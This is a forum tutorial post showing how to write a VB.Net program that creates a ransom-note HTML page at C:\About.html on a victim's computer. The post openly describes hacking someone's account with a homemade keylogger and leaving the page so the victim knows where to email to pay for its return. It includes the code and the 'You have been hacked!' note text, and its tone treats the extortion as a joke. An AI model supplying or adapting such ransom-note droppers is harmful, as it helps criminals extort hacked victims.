Login Register






[VB.Net] Make a HTML about page filter_list
Author
Message
[VB.Net] Make a HTML about page #1
Ok the first question is that WHY to even make a about page?
answer: For example you have a custom keylogger which you made your self and don't want to use RAT's. When you hack the victim and want to make money out of it for returning his account well, he wont know how to contact you. you can make a About page in his computer to tell him how to contact you Biggrin.

Things you need:
  • Visual Studio :epic:
  • Some knowledge of HTML ( the basics )
  • Some VB knowledge :epic:
  • A Brain :epic:




First open your project or start a new one. you can put this in the form's load. so add a:
Code:
Imports system.io

above Public Class Form1

Then add
Code:
Private sub form1_load handles mybase.load

Now you need to chose the location that the file is going to be created, So we are going to use a string dim. add this:
Code:
Dim location as string = "C:\About.html"

( Note that the file can be .htm, .html, .asp and .txt :epic: )
Now in your form add a new Label ( i use labels Biggrin ) and in the text field add this:
Code:
<html> <title>You have been hacked!</title> <body><center> <p><font color="FF0000">Your account has been hacked! for return of it mail: any@any.com</font></center> </body> </html>

Now below the dim location as string = "C:\About.html" add:
Code:
dim ftr As New FileStream(location, FileMode.Create, FileAccess.Write) dim stw As New StreamWriter(ftr) stw.BaseStream.Seek(0, SeekOrigin.End) stw.Write(Label1.Text) stw.Close() End sub

And now you have an About page Biggrin


Hope this guide helped someone Smile
(This post was last modified: 01-18-2011, 03:43 PM by Skullmeat.)
Pierce the life fibers with your drill.

Reply